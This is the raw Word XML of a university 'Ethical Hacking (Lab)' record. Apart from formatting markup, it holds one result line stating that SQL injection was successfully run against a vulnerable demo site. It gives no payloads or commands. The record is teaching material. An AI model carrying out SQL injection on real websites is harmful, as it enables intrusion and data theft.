      </w:pPr>
      <w:r w:rsidRPr="009F4970">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0BD672B3" wp14:editId="541AFA07">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>390525</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6049645" cy="1912620"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:wrapThrough wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21299"/>
                <wp:lineTo x="21561" y="21299"/>
                <wp:lineTo x="21561" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapThrough>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49645" cy="1912620"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="725CD54A" w14:textId="77777777" w:rsidR="00AA2469" w:rsidRPr="00AA2469" w:rsidRDefault="00AA2469" w:rsidP="00AA2469">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7365417B" w14:textId="7E5B1EFF" w:rsidR="00AA2469" w:rsidRPr="00AA2469" w:rsidRDefault="00AA2469" w:rsidP="00AA2469">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6330"/>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w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">esult: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCCFF5" w14:textId="0E8DFAE1" w:rsidR="00AA2469" w:rsidRPr="00AA2469" w:rsidRDefault="00AA2469" w:rsidP="00AA2469">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA2469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The tesfire.net was successfully used to execute an SQL Injection Attack on a vulnerable   website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25897414" w14:textId="77777777" w:rsidR="00AA2469" w:rsidRPr="00AA2469" w:rsidRDefault="00AA2469" w:rsidP="00AA2469">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="456896B8" w14:textId="77777777" w:rsidR="00AA2469" w:rsidRPr="00AA2469" w:rsidRDefault="00AA2469" w:rsidP="00AA2469">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="190D6980" w14:textId="77777777" w:rsidR="00AA2469" w:rsidRPr="00AA2469" w:rsidRDefault="00AA2469" w:rsidP="00AA2469">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="197E9EE7" w14:textId="77777777" w:rsidR="00AA2469" w:rsidRPr="00AA2469" w:rsidRDefault="00AA2469" w:rsidP="00AA2469">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00AA2469" w:rsidRPr="00AA2469" w:rsidSect="001A44D3">
      <w:headerReference w:type="default" r:id="rId11"/>
      <w:footerReference w:type="default" r:id="rId12"/>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3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D679B" w14:textId="77777777" w:rsidR="001D2DC5" w:rsidRDefault="001D2DC5">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="667B71B6" w14:textId="77777777" w:rsidR="001D2DC5" w:rsidRDefault="001D2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6AA27" w14:textId="77777777" w:rsidR="00561E77" w:rsidRPr="007B465B" w:rsidRDefault="00561E77">
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:pBdr>
        <w:top w:val="nil"/>
        <w:left w:val="nil"/>
        <w:bottom w:val="nil"/>
        <w:right w:val="nil"/>
        <w:between w:val="nil"/>
      </w:pBdr>
      <w:spacing w:after="0"/>
      <w:rPr>
        <w:color w:val="FFFFFF" w:themeColor="background1"/>
      </w:rPr>
    </w:pPr>
  </w:p>
  <w:tbl>
    <w:tblPr>
      <w:tblStyle w:val="a1"/>
      <w:tblW w:w="9590" w:type="dxa"/>
      <w:tblInd w:w="-115" w:type="dxa"/>
      <w:tblLayout w:type="fixed"/>
      <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
    </w:tblPr>
    <w:tblGrid>
      <w:gridCol w:w="8631"/>
      <w:gridCol w:w="959"/>
    </w:tblGrid>
    <w:tr w:rsidR="007B465B" w:rsidRPr="007B465B" w14:paraId="65FDEDE2" w14:textId="77777777">
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="8631" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
          </w:tcBorders>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        </w:tcPr>
        <w:p w14:paraId="45DA7881" w14:textId="77777777" w:rsidR="00561E77" w:rsidRPr="007B465B" w:rsidRDefault="00561E77">
          <w:pPr>
            <w:pBdr>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
              <w:between w:val="nil"/>
            </w:pBdr>
            <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            <w:jc w:val="right"/>
            <w:rPr>
              <w:color w:val="FFFFFF" w:themeColor="background1"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="959" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="4" w:space="0" w:color="C0504D"/>
          </w:tcBorders>
          <w:shd w:val="clear" w:color="auto" w:fill="943634"/>
        </w:tcPr>
        <w:p w14:paraId="694DBAA3" w14:textId="77777777" w:rsidR="00561E77" w:rsidRPr="007B465B" w:rsidRDefault="00512213" w:rsidP="00E57563">
          <w:pPr>
            <w:pBdr>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
              <w:between w:val="nil"/>
            </w:pBdr>
            <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:color w:val="FFFFFF" w:themeColor="background1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="007B465B">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:color w:val="FFFFFF" w:themeColor="background1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00A421B4" w:rsidRPr="007B465B">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:color w:val="FFFFFF" w:themeColor="background1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText>PAGE</w:instrText>
          </w:r>
          <w:r w:rsidRPr="007B465B">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:color w:val="FFFFFF" w:themeColor="background1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="009B681C" w:rsidRPr="007B465B">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
              <w:color w:val="FFFFFF" w:themeColor="background1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>1</w:t>
          </w:r>
          <w:r w:rsidRPr="007B465B">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:color w:val="FFFFFF" w:themeColor="background1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w14:paraId="599BDBCE" w14:textId="77777777" w:rsidR="00561E77" w:rsidRPr="007B465B" w:rsidRDefault="00561E77">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="nil"/>
        <w:left w:val="nil"/>
        <w:bottom w:val="nil"/>
        <w:right w:val="nil"/>
        <w:between w:val="nil"/>
      </w:pBdr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>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383F2" w14:textId="77777777" w:rsidR="001D2DC5" w:rsidRDefault="001D2DC5">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="65A1E169" w14:textId="77777777" w:rsidR="001D2DC5" w:rsidRDefault="001D2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80805" w14:textId="77777777" w:rsidR="00561E77" w:rsidRPr="000576D2" w:rsidRDefault="00561E77">
    <w:pPr>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0"/>
      <w:tblW w:w="9878" w:type="dxa"/>
      <w:tblInd w:w="-115" w:type="dxa"/>
      <w:tblBorders>
        <w:top w:val="nil"/>
        <w:left w:val="nil"/>
        <w:bottom w:val="single" w:sz="18" w:space="0" w:color="808080"/>
        <w:right w:val="nil"/>
        <w:insideH w:val="nil"/>
        <w:insideV w:val="single" w:sz="18" w:space="0" w:color="808080"/>
      </w:tblBorders>
      <w:tblLayout w:type="fixed"/>
      <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
    </w:tblPr>
    <w:tblGrid>
      <w:gridCol w:w="7628"/>
      <w:gridCol w:w="2250"/>
    </w:tblGrid>
    <w:tr w:rsidR="000576D2" w:rsidRPr="000576D2" w14:paraId="195E563D" w14:textId="77777777" w:rsidTr="00F645A7">
      <w:trPr>
        <w:trHeight w:val="277"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="7628" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="461865EF" w14:textId="77FA6D50" w:rsidR="00561E77" w:rsidRPr="000576D2" w:rsidRDefault="002E7A9C" w:rsidP="002437CA">
          <w:pPr>
            <w:rPr>
              <w:rFonts w:ascii="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
              <w:b/>
              <w:sz w:val="30"/>
              <w:szCs w:val="30"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
              <w:b/>
              <w:sz w:val="26"/>
              <w:szCs w:val="32"/>
            </w:rPr>
            <w:t>18CS3101 Ethical Hacking (Lab)</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="2250" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="310B4B8E" w14:textId="555FEA2A" w:rsidR="00561E77" w:rsidRPr="000576D2" w:rsidRDefault="000576D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b/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>URK20CS2001</w:t>
          </w:r>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w14:paraId="531F18DB" w14:textId="77777777" w:rsidR="00561E77" w:rsidRPr="000576D2" w:rsidRDefault="00561E77">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="nil"/>
        <w:left w:val="nil"/>
        <w:bottom w:val="nil"/>
        <w:right w:val="nil"/>
        <w:between w:val="nil"/>
      </w:pBd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E40BD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3E2443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6972ED"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D8527C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8439902">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="135076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1E77"/>
    <w:rsid w:val="00012483"/>
    <w:rsid w:val="000576D2"/>
    <w:rsid w:val="000760C4"/>
    <w:rsid w:val="00087950"/>
    <w:rsid w:val="000A533B"/>
    <w:rsid w:val="000F7C31"/>
    <w:rsid w:val="00131AAC"/>
    <w:rsid w:val="00183FE0"/>
    <w:rsid w:val="001A44D3"/>
    <w:rsid w:val="001D2DC5"/>
    <w:rsid w:val="002376F1"/>
    <w:rsid w:val="002437CA"/>
    <w:rsid w:val="00252A7D"/>
    <w:rsid w:val="002E7A9C"/>
    <w:rsid w:val="003051AB"/>
    <w:rsid w:val="003F51D6"/>
    <w:rsid w:val="004D479C"/>
    <w:rsid w:val="004F290A"/>
    <w:rsid w:val="00512213"/>
    <w:rsid w:val="00561E77"/>
    <w:rsid w:val="005E0CFC"/>
    <w:rsid w:val="005F36BE"/>
    <w:rsid w:val="006257BC"/>
    <w:rsid w:val="00644598"/>
    <w:rsid w:val="006F303F"/>
    <w:rsid w:val="00762A0C"/>
    <w:rsid w:val="007B465B"/>
    <w:rsid w:val="007D08C4"/>
    <w:rsid w:val="008215BD"/>
    <w:rsid w:val="008376BB"/>
    <w:rsid w:val="008757FB"/>
    <w:rsid w:val="008D609D"/>
    <w:rsid w:val="00903097"/>
    <w:rsid w:val="0092281B"/>
    <w:rsid w:val="0098591D"/>
    <w:rsid w:val="009A4415"/>
    <w:rsid w:val="009B681C"/>
    <w:rsid w:val="009C2E60"/>
    <w:rsid w:val="00A421B4"/>
    <w:rsid w:val="00AA2469"/>
    <w:rsid w:val="00B13621"/>
    <w:rsid w:val="00B90523"/>
    <w:rsid w:val="00BE773A"/>
    <w:rsid w:val="00C1347D"/>
    <w:rsid w:val="00C44EF0"/>
    <w:rsid w:val="00CC3407"/>
    <w:rsid w:val="00CF50E1"/>
    <w:rsid w:val="00DA2C2B"/>
    <w:rsid w:val="00E57563"/>
    <w:rsid w:val="00E7706D"/>
    <w:rsid w:val="00EE45C7"/>
    <w:rsid w:val="00EF0663"/>
    <w:rsid w:val="00F21D5F"/>
    <w:rsid w:val="00F645A7"/>
    <w:rsid w:val="00FA14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4D6F4"/>
  <w15:docId w15:val="{2C1C281F-70C0-4A1A-B662-3910E637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12213"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:rsid w:val="00512213"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="480" w:after="120"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:rsid w:val="00512213"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="360" w:after="80"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:rsid w:val="00512213"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="280" w:after="80"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:rsid w:val="00512213"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240" w:after="40"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:rsid w:val="00512213"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="220" w:after="40"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:rsid w:val="0051221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12213"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="480" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="72"/>
      <w:szCs w:val="72"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Subtitle">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:rsid w:val="00512213"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="360" w:after="80"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia" w:cs="Georgia"/>
      <w:i/>
      <w:color w:val="666666"/>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="a">
    <w:basedOn w:val="TableNormal"/>
    <w:rsid w:val="00512213"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="a0">
    <w:basedOn w:val="TableNormal"/>
    <w:rsid w:val="00512213"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:top w:w="72" w:type="dxa"/>
        <w:left w:w="115" w:type="dxa"/>
        <w:bottom w:w="72" w:type="dxa"/>
        <w:right w:w="115" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="a1">
    <w:basedOn w:val="TableNormal"/>
    <w:rsid w:val="00512213"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:top w:w="72" w:type="dxa"/>
        <w:left w:w="115" w:type="dxa"/>
        <w:bottom w:w="72" w:type="dxa"/>
        <w:right w:w="115" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CF5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0E1"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CF5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0E1"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00057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2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37A12-4995-4B0E-8AE1-B4B8BFB4A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Mr.V.Ebenezer</dc:creator>
  <cp:lastModifiedBy>Ruban Gino Singh</cp:lastModifiedBy>
  <cp:revision>32</cp:revision>
  <cp:lastPrinted>2023-11-06T08:56:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-01-19T04:23:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-06T09:38:00Z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0b5fba4094f448ddfe366973868a91778404983e59ead1a0b8f879e9a4cf8e4d</vt:lpwstr>
  </property>
</Properties>
</file>